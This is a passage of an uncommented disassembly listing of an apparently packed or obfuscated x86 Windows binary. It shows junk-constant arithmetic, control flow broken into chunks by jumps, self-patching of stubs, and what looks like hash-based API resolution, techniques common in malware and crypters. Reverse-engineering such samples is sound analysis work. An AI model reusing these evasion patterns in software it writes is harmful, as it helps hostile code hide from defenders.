loc_442F00: ; CODE XREF: sub_43EB8A+7A77j
jmp loc_44C52C
; END OF FUNCTION CHUNK FOR sub_43EB8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_442F05: ; CODE XREF: sub_43F7A5+1758j
jmp loc_4441CF
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
loc_442F0A: ; CODE XREF: ut7h7i2x:0043C3D7j
jmp loc_44D965
; =============== S U B R O U T I N E =======================================
sub_442F0F proc near ; CODE XREF: sub_4519D2+Ep
; FUNCTION CHUNK AT 0044C2FF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456A0A SIZE 00000005 BYTES
mov eax, large fs:0
loc_442F16: ; CODE XREF: sub_4392AE+9j
; sub_442F0F:loc_44C2FFj
jnb loc_44C306
cmp dword ptr [eax], 0FFFFFFFFh
mov ebx, [eax+4]
mov eax, [eax]
jmp loc_456A0A
sub_442F0F endp
; ---------------------------------------------------------------------------
loc_442F29: ; CODE XREF: ut7h7i2x:00448B33j
add ecx, 0B59823E2h
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_442F2F: ; CODE XREF: sub_439D5C:loc_457C8Ej
add edx, 551A076Dh
mov [edx], eax
pop edx
jmp loc_44F0B2
; END OF FUNCTION CHUNK FOR sub_439D5C
; ---------------------------------------------------------------------------
loc_442F3D: ; CODE XREF: ut7h7i2x:0043CAAAj
jg loc_43CE26
sub ebp, esi
mov eax, [edi]
loc_442F47: ; CODE XREF: ut7h7i2x:loc_4478A0j
add eax, edx
xor eax, ebx
jmp loc_45556A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F1B2
loc_442F50: ; CODE XREF: sub_43F1B2+461Aj
jo loc_458D73
cmp eax, 60A5E586h
jmp loc_44BF57
; END OF FUNCTION CHUNK FOR sub_43F1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_442F61: ; CODE XREF: sub_447EB5:loc_439DD6j
push esi
call sub_458389
loc_442F67: ; CODE XREF: ut7h7i2x:0045720Cj
jmp loc_44F527
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_442F6C: ; CODE XREF: sub_44825D+1FCCj
jnz loc_452889
jmp loc_449D82
; END OF FUNCTION CHUNK FOR sub_44825D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454ABB
loc_442F77: ; CODE XREF: sub_454ABB+13j
pop eax
and eax, 0EAC86BACh
or eax, 22347351h
; END OF FUNCTION CHUNK FOR sub_454ABB
; START OF FUNCTION CHUNK FOR sub_44602A
loc_442F84: ; CODE XREF: sub_44602A:loc_45026Aj
xor eax, 0B47E9E57h
add eax, 0AA00DF1Eh
mov eax, [eax]
jmp loc_45161C
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449DFF
loc_442F97: ; CODE XREF: sub_449DFF:loc_45770Dj
push 36F3E618h
pop ecx
xor ecx, 8067B42Bh
rol ecx, 1Ah
jmp loc_453007
; END OF FUNCTION CHUNK FOR sub_449DFF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_442FAB: ; CODE XREF: sub_4408C2:loc_4450DBj
mov esi, [edx]
jmp loc_44F78F
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CA4
loc_442FB2: ; CODE XREF: sub_458CA4:loc_44A9F9j
mov al, [eax]
jno loc_44BF62
sub al, 99h
push 61FB4EC1h
pop edx
add edx, ds:4000F9h
sub edx, 4FB6A3D0h
jmp loc_458755
; END OF FUNCTION CHUNK FOR sub_458CA4
; ---------------------------------------------------------------------------
call sub_459A90
loc_442FD8: ; CODE XREF: ut7h7i2x:0045872Dj
jmp loc_43F6C7
; ---------------------------------------------------------------------------
loc_442FDD: ; CODE XREF: ut7h7i2x:0044B09Bj
jmp locret_43DDD8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444BA4
loc_442FE2: ; CODE XREF: sub_444BA4+5j
jmp nullsub_55
; END OF FUNCTION CHUNK FOR sub_444BA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_442FE7: ; CODE XREF: sub_442B3B:loc_43E3DEj
; ut7h7i2x:004426C3j
and ecx, 65659389h
jns loc_440F02
loc_442FF3: ; CODE XREF: sub_457453+140Bj
jmp loc_459376
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
rol ecx, 5
and ecx, 5AF908BAh
adc edx, 8A5A64EBh
jmp loc_440F02
; ---------------------------------------------------------------------------
call nullsub_3
push edx
push 439736EEh
pop edx
jmp loc_4580CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_44301D: ; CODE XREF: sub_43CE34+11j
jnz loc_4537C7
jmp loc_43EC99
; END OF FUNCTION CHUNK FOR sub_43CE34
; ---------------------------------------------------------------------------
push ecx
push 0A4898CAFh
pop ecx
add ecx, 0FF2740D2h
or ecx, 975DA183h
add ecx, 0E376D94Dh
cmp ecx, 66D2FDCEh
jmp loc_43AFD6
; ---------------------------------------------------------------------------
loc_44304C: ; DATA XREF: ut7h7i2x:00446799o
pop esi
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_43D259
; START OF FUNCTION CHUNK FOR sub_45A79F
loc_443058: ; CODE XREF: sub_45A79F-7941j
jmp loc_454964
; END OF FUNCTION CHUNK FOR sub_45A79F
; =============== S U B R O U T I N E =======================================
sub_44305D proc near ; CODE XREF: ut7h7i2x:00439270j
; sub_450FDE-EFD9p
; FUNCTION CHUNK AT 00444F1E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00446280 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452042 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004541D6 SIZE 0000000F BYTES
xchg ebx, [esp+0]
pop ebx
push ebp
mov ebp, eax
xchg ebp, [esp+0]
mov eax, edx
jmp loc_446280
sub_44305D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_44306E: ; CODE XREF: sub_448321+70D1j
push edi
push offset sub_447132
jmp loc_4470E0
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B19
loc_443079: ; CODE XREF: sub_456B19:loc_447FECj
jge loc_43A600
; END OF FUNCTION CHUNK FOR sub_456B19
; START OF FUNCTION CHUNK FOR sub_43CD2F
loc_44307F: ; CODE XREF: sub_43CD2F+9A21j
jmp nullsub_60
; END OF FUNCTION CHUNK FOR sub_43CD2F
; ---------------------------------------------------------------------------
xor ecx, 92D79913h
jge loc_439A86
add ebx, 0F3832645h
jmp loc_43A600
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CA2D
loc_44309B: ; CODE XREF: sub_43CA2D:loc_450923j
jb loc_45034A
jmp loc_443D0F
; END OF FUNCTION CHUNK FOR sub_43CA2D
; ---------------------------------------------------------------------------
loc_4430A6: ; CODE XREF: ut7h7i2x:00457D17j
jle loc_450DF8
or ebx, 0AB21BB3Ch
cmp eax, 7C95ACA8h
jmp loc_449819
; ---------------------------------------------------------------------------
mov eax, 3C248B30h
call sub_43AA94
push offset sub_43AAF5
jmp locret_4533FC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_348. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_4430D2: ; CODE XREF: sub_440CEC:loc_453417j
mov ebp, esp
add esp, 0FFFFFFF4h
mov [ebp-8], edx
mov [ebp-4], eax
cmp dword ptr [ebp-8], 0
jnz loc_45AB18
mov eax, [ebp-4]
loc_4430EA: ; CODE XREF: sub_459B58:loc_441260j
jmp loc_43B7D3
; END OF FUNCTION CHUNK FOR sub_440CEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_4430EF: ; CODE XREF: sub_43FCEE+E83Bj
jno loc_441ECD
jp loc_44982A
jmp loc_43D9D2
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D3B
loc_443100: ; CODE XREF: sub_449D3B+16A2j
sub al, 99h
push 0F90937DBh
pop edx
sub edx, 9B0EFC21h
jmp loc_43A58A
; END OF FUNCTION CHUNK FOR sub_449D3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_443113: ; CODE XREF: sub_457A66-119F8j
push ecx
mov ecx, eax
xchg ecx, [esp+0]
ror eax, 10h
push edi
push 5A3ACFD1h
jmp loc_444D36
; END OF FUNCTION CHUNK FOR sub_457A66
; =============== S U B R O U T I N E =======================================
sub_443127 proc near ; DATA XREF: ut7h7i2x:0045AB0Bo
xchg edx, [esp+0]
call sub_44BDF1
sub_443127 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_459FE9
loc_44312F: ; CODE XREF: sub_459FE9-32Ej
jmp loc_45761A
; END OF FUNCTION CHUNK FOR sub_459FE9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_443134: ; CODE XREF: sub_43A556:loc_456CF0j
; ut7h7i2x:00456D04j
or eax, 6499853Eh
xor eax, 31D18AF7h
add eax, ebp
add eax, 0AAB5B82Bh
push edx
mov edx, eax
xchg edx, [esp+0]
push 464FB328h
jmp loc_44C0C3
; END OF FUNCTION CHUNK FOR sub_43A556
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_489. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_443159: ; CODE XREF: sub_44E2C4+17j
jmp loc_44A277
; END OF FUNCTION CHUNK FOR sub_44E2C4
; ---------------------------------------------------------------------------
xor ecx, 139E5F49h
jmp sub_456CBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CA4
loc_443169: ; CODE XREF: sub_458CA4:loc_44676Fj
jnz loc_446AE8
jmp loc_44FC49
; END OF FUNCTION CHUNK FOR sub_458CA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45967C
loc_443174: ; CODE XREF: sub_45967C:loc_449ABDj
sbb ebp, edx
jmp loc_442343
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
loc_44317B: ; CODE XREF: ut7h7i2x:loc_444B15j
mov eax, 4AC5B528h
call sub_43AA94
mov ds:dword_41D080, eax
lea eax, nullsub_113
mov byte ptr [eax], 0C3h
jmp loc_44F159
; ---------------------------------------------------------------------------
pop edx
mov eax, [esp]
push edx
jmp loc_446829
; =============== S U B R O U T I N E =======================================
sub_4431A3 proc near ; CODE XREF: sub_44E2C4-14FEDp
; ut7h7i2x:00447DBAj
xchg eax, [esp+0]
pop eax
sub eax, [ebp-4]
call sub_450645
loc_4431AF: ; CODE XREF: ut7h7i2x:00446BD6j
jmp nullsub_48
sub_4431A3 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_81. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4431B5: ; CODE XREF: ut7h7i2x:00453507j
call sub_4575F9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_411. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4431BB proc near ; DATA XREF: ut7h7i2x:00439847o
; FUNCTION CHUNK AT 0043E98B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00451D8E SIZE 00000005 BYTES
mov ecx, [ecx]
or [ecx+edx], al
mov ecx, [ebp-20h]
and ecx, 7
mov al, 1
jmp loc_451D8E
sub_4431BB endp
; ---------------------------------------------------------------------------
push 57362A6Bh
pop eax
; START OF FUNCTION CHUNK FOR sub_43D021
loc_4431D3: ; CODE XREF: sub_43D021:loc_45AB9Cj
sub eax, 0EFD5C241h
cmp eax, 7D38D360h
jmp loc_4518FB
; END OF FUNCTION CHUNK FOR sub_43D021
; =============== S U B R O U T I N E =======================================
sub_4431E4 proc near ; CODE XREF: ut7h7i2x:0043C298j
; sub_43CE34:loc_43CA81p
; FUNCTION CHUNK AT 00442E94 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F46F SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00450222 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
jnb loc_44F490
lea eax, [ebp-125h]
push eax
call sub_43BA59
jmp loc_450222
sub_4431E4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4431FF proc near ; DATA XREF: sub_4548FDo
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439088 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043E447 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00441446 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445A6E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447B84 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00449E4A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B0C0 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044C31D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044D5A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DAF0 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044E218 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045052E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00452077 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004552A1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455339 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00456F8C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459971 SIZE 0000001A BYTES
push edx
mov edx, ebp
xchg edx, [esp+0]
mov ebp, esp
push edi
jmp loc_455339
sub_4431FF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C273
loc_44320D: ; CODE XREF: sub_44C273:loc_44C279j
pop ecx
cmp dword ptr [ebp-8], 0
jz loc_4569A7
jmp loc_43D967
; END OF FUNCTION CHUNK FOR sub_44C273
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_539. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454277
loc_44321E: ; CODE XREF: sub_454277+2042j
jmp sub_450A48
; END OF FUNCTION CHUNK FOR sub_454277
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_443223: ; CODE XREF: sub_4459EE+C3C7j
jmp loc_448EB1
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D17F
loc_443228: ; CODE XREF: sub_43D17F+Aj
jmp loc_448F46
; END OF FUNCTION CHUNK FOR sub_43D17F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4455F4
loc_44322D: ; CODE XREF: sub_4455F4+583Bj
or eax, eax
jnz loc_44E8FB
jmp loc_444657
; END OF FUNCTION CHUNK FOR sub_4455F4
; ---------------------------------------------------------------------------
loc_44323A: ; CODE XREF: ut7h7i2x:00449758j
; ut7h7i2x:loc_45349Ej
call sub_43FD68
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D43D
loc_443240: ; CODE XREF: sub_44D43D+1FDFj
jmp loc_44FC85
; END OF FUNCTION CHUNK FOR sub_44D43D
; ---------------------------------------------------------------------------
loc_443245: ; CODE XREF: ut7h7i2x:0044CE04j
jmp loc_45890F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_44324A: ; CODE XREF: sub_442B3B+FC4j
jmp loc_43CA38
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4471CA
loc_44324F: ; CODE XREF: sub_4471CA-D4F4j
jmp loc_44D603
; END OF FUNCTION CHUNK FOR sub_4471CA
; ---------------------------------------------------------------------------
loc_443254: ; CODE XREF: ut7h7i2x:00454A85j
push edx
push 0A9B20E36h
pop edx
jmp loc_4497B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4497C1
loc_443260: ; CODE XREF: sub_4497C1:loc_44769Bj
jz loc_4437D3
push 85058358h
xchg edi, edx
sbb eax, 0E87979C0h
jmp loc_4437D1
; END OF FUNCTION CHUNK FOR sub_4497C1
; ---------------------------------------------------------------------------
loc_443278: ; CODE XREF: ut7h7i2x:0044899Cj
mov ebx, eax
push offset loc_4504B5
jmp locret_44AF25
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440F8E
loc_443284: ; CODE XREF: sub_440F8E:loc_4537BCj
mov [ebp+0], ebx
jmp loc_44C268
; END OF FUNCTION CHUNK FOR sub_440F8E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_520. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_44328D: ; CODE XREF: sub_441765:loc_43D21Bj
; sub_441765+12284j
mov eax, [ebp-0Ch]
push edx
mov edx, eax
xchg edx, [esp+0]
jmp loc_4588AD
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447B48
loc_44329B: ; CODE XREF: sub_447B48:loc_44105Cj
or ebx, 0B62A97E1h
cmp ebx, 0EA9C681Ch
; END OF FUNCTION CHUNK FOR sub_447B48
; START OF FUNCTION CHUNK FOR sub_44F943
loc_4432A7: ; CODE XREF: sub_44F943:loc_4424FDj
jmp loc_45A29B
; END OF FUNCTION CHUNK FOR sub_44F943
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_4432AC: ; CODE XREF: sub_43DBEC-34A8j
xchg ebp, [eax]
test esi, 0D0C49C00h
jmp loc_450D90
; END OF FUNCTION CHUNK FOR sub_43DBEC
; =============== S U B R O U T I N E =======================================
sub_4432B9 proc near ; DATA XREF: ut7h7i2x:00443444o
push eax
push 631DFDE6h
pop eax
xor eax, 28439015h
or eax, 9997C447h
jmp loc_44E560
sub_4432B9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446B90
loc_4432D1: ; CODE XREF: sub_446B90+3j
push ecx
push esi
push 14E9A67Dh
pop esi
add esi, 34A3E460h
or esi, 37327B85h
jmp loc_4483DB
; END OF FUNCTION CHUNK FOR sub_446B90
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_4432EA: ; CODE XREF: sub_44A3BB:loc_43F10Dj
ja loc_4463A3
jmp loc_44BD00
; END OF FUNCTION CHUNK FOR sub_44A3BB
; =============== S U B R O U T I N E =======================================
sub_4432F5 proc near ; CODE XREF: ut7h7i2x:0043B3E9j
; sub_4408C2:loc_43F335j ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00448FCE SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
add edi, 34D2ED0Bh
xchg edi, [esp-4+arg_0]
jmp loc_448FCE
sub_4432F5 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_112. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E70F
loc_443308: ; CODE XREF: sub_44E70F-13CCBj
jmp loc_44A9B6
; END OF FUNCTION CHUNK FOR sub_44E70F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_44330D: ; CODE XREF: sub_4489DF-EF36j
jmp loc_453781
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449C6F
loc_443312: ; CODE XREF: sub_449C6F:loc_44757Dj
push eax
mov eax, edx
xchg eax, [esp+8+var_8]
call sub_455807
mov eax, 99B20D50h
call sub_43AA94
mov ds:off_41D078, eax
lea eax, sub_449C6F
jmp loc_43CCE6
; END OF FUNCTION CHUNK FOR sub_449C6F
; ---------------------------------------------------------------------------
aZ4LQshooiS_d db '‡4$‹ìQShoOi+é.¤',0 ; CODE XREF: sub_455807:loc_439C13j
; DATA XREF: sub_452E7F+3o
dd 24048B00h, 10E45E8h
db 0, 0C3h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_443352: ; CODE XREF: sub_44577E+3ACEj
; sub_43A556:loc_453278j
jmp loc_43F188
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_443357: ; CODE XREF: ut7h7i2x:0043F85Ej
jmp loc_43DBFC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457AEF
loc_44335C: ; CODE XREF: sub_457AEF+1A4Ej
sub eax, 0E41F5103h
mov edx, [esp+0]
push ecx
jmp loc_44CDCB
; END OF FUNCTION CHUNK FOR sub_457AEF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459485
loc_44336B: ; CODE XREF: sub_459485:loc_447FF1j
xor ebx, 91023A1Dh
add ebx, ebp
add ebx, 0FEB7DD58h
mov [ebx], ecx
jmp loc_446359
; END OF FUNCTION CHUNK FOR sub_459485
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_281. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C413
loc_443381: ; CODE XREF: sub_43C413+Cj
jmp loc_45A963
; END OF FUNCTION CHUNK FOR sub_43C413
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_443386: ; CODE XREF: sub_4503C3-14040j
jmp loc_4393F5
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4402A5
loc_44338B: ; CODE XREF: sub_4402A5:loc_441240j
shr edi, 1Ch
loc_44338E: ; CODE XREF: ut7h7i2x:00455C0Fj
pop edx
mov edx, 30BCB20h
jb loc_43CC1B
jmp loc_453880
; END OF FUNCTION CHUNK FOR sub_4402A5
; =============== S U B R O U T I N E =======================================
sub_44339F proc near ; CODE XREF: sub_43FA90+2p
; ut7h7i2x:0044438Ej
var_4 = dword ptr -4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043E80F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043F300 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00443ED8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EE6D SIZE 00000005 BYTES
xchg ebx, [esp+4+var_4]
pop ebx
pop esi
jno loc_43E80F
mov eax, [esp+0]
push edx
jmp loc_443ED8
sub_44339F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4433B3: ; CODE XREF: ut7h7i2x:0043EFA4j
xor esi, 0B70519D0h
; =============== S U B R O U T I N E =======================================
sub_4433B9 proc near ; CODE XREF: sub_4456F4+3p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043F551 SIZE 0000001A BYTES
xchg esi, [esp+0]
pop esi
xchg esi, [esp-4+arg_0]
jmp loc_43F551
sub_4433B9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4433C5 proc near ; CODE XREF: ut7h7i2x:0043A576p
; ut7h7i2x:004453C6j ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043B6C1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BB0B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BD94 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043EA57 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043F736 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043FCFC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FFDD SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00440F2E SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044267C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00443A5F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00443E5E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004445CF SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004475EE SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044A1B0 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044AD0D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C1BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CBFD SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044D0DA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F6A4 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00450F8C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004517B6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452072 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045222B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453EAF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455ACF SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00457EBB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A344 SIZE 0000000B BYTES
xchg ebx, [esp+0]
pop ebx
xchg esi, [esp+0]
mov [ebp-4], eax
mov eax, [ebp-4]
mov al, [eax]
jmp loc_44AD0D
sub_4433C5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4433D9: ; CODE XREF: ut7h7i2x:00454136j
jz loc_451972
xor esi, 0FAB44DA5h
jmp sub_43BA9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_4433EA: ; CODE XREF: sub_44602A:loc_4458C6j
mov eax, [edi]
add esi, ecx
cdq
shl ebx, 11h
jmp loc_43EBFD
; END OF FUNCTION CHUNK FOR sub_44602A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_415. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441AED
loc_4433F8: ; CODE XREF: sub_441AED+181EFj
jz loc_4391F9
jmp loc_43BAB4
; END OF FUNCTION CHUNK FOR sub_441AED
; ---------------------------------------------------------------------------
loc_443403: ; CODE XREF: ut7h7i2x:00458A46j
pop eax
and eax, 0EDBA890h
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44340A: ; CODE XREF: sub_43AB62:loc_450227j
xor eax, 657C1932h
and eax, 0DD85332Dh
jmp loc_44D772
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A218
loc_44341B: ; CODE XREF: sub_43A218:loc_44AFF8j
jz loc_449D11
jmp loc_4479E1
; END OF FUNCTION CHUNK FOR sub_43A218
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_54. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A45
loc_443427: ; CODE XREF: sub_443A45+15j
jmp loc_444AC1
; END OF FUNCTION CHUNK FOR sub_443A45
; ---------------------------------------------------------------------------
loc_44342C: ; CODE XREF: ut7h7i2x:0044F1C0j
lea eax, nullsub_490
mov byte ptr [eax], 0C3h
jmp nullsub_490
; ---------------------------------------------------------------------------
xchg ebp, [esp]
mov edx, ebp
pop ebp
mov eax, [esp]
push edx
push offset sub_4432B9
jmp loc_44B7E9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_483. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44344F: ; CODE XREF: sub_439BF8+1DC00j
; DATA XREF: fabskl8p:off_420C6Co
jmp loc_44F89B
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456923
loc_443454: ; CODE XREF: sub_456923-A7D4j
jmp sub_45500F
; END OF FUNCTION CHUNK FOR sub_456923
; =============== S U B R O U T I N E =======================================
sub_443459 proc near ; DATA XREF: ut7h7i2x:00447052o
; FUNCTION CHUNK AT 004401EA SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004500E6 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045241C SIZE 00000005 BYTES
lea eax, [ebp-8]
push eax
push 0E8D3F59Dh
pop eax
xor eax, ds:4000F0h
and eax, 56F140DAh
add eax, 28BBA22Fh
rol eax, 14h
jmp loc_45241C
sub_443459 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44347D: ; CODE XREF: ut7h7i2x:loc_45109Aj
; ut7h7i2x:00459896j
call sub_443488
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450E41
loc_443483: ; CODE XREF: sub_450E41+12j
jmp loc_43ECEC
; END OF FUNCTION CHUNK FOR sub_450E41
; =============== S U B R O U T I N E =======================================
sub_443488 proc near ; CODE XREF: ut7h7i2x:loc_44347Dp
push ebp
call sub_4570FD
sub_443488 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_452AAF
loc_44348E: ; CODE XREF: sub_452AAF+18j
jmp loc_452137
; END OF FUNCTION CHUNK FOR sub_452AAF
; ---------------------------------------------------------------------------
